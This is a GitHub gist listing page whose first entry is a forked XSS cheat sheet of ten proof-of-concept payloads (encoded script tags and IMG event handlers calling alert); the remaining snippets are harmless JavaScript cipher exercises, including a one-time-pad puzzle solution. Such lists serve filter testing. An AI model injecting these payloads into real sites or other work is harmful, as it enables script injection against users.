Eric Brandel ebrandel
ebrandel
/ xss_vectors.txt
Created
April 27, 2018 00:06
— forked from kurobeats/xss_vectors.txt
XSS Vectors Cheat Sheet
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| %253Cscript%253Ealert('XSS')%253C%252Fscript%253E | |
| <IMG SRC=x onload="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onload="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))"> | |
| <IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))"> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var letters = "ABCDEFGHIKLMNOPQRSTUVWXYZ"; | |
| // encrypt and decrypt this plain text | |
| var plainText = "No Its THE code breaker No more secrets"; | |
| // remove spaces | |
| var compressedText = plainText.replace(/\s+/g, "").toLocaleUpperCase(); | |
| var decryptedText = ""; | |
| // The key needs to be repeated until it's the same length as the text to encrypt |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var _ = require("lodash"); | |
| var plainText = "On the other side of the screen it all looks so easy"; | |
| var key = "4123"; | |
| var cipherText = ""; | |
| var cols = []; | |
| _.each(key.split(""), function(k) { | |
| cols.push({ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // JavasScript solution to the NSA's OTP puzzle | |
| // https://www.facebook.com/NSACareers/photos/a.10150165394744358.374663.38534064357/10155202632259358/?type=3&theater | |
| var cipherText = "6097703920902805098792458100127006308920278750110017283152904512008635073921961285410397244195102032905201942802717080593227"; | |
| var key = "6981642705701301086201207791115091207421138236919216132358913111926129022415841781360483274671901231854407951401635567442416"; | |
| var message = ""; | |
| // offset this so that letters.charAt(1) returns A and letters.charAt(26) returns Z | |
| var letters = " abcdefghijklmnopqrstuvwxyz"; | |
| // Doing the second step here: https://en.wikipedia.org/wiki/One-time_pad#Example |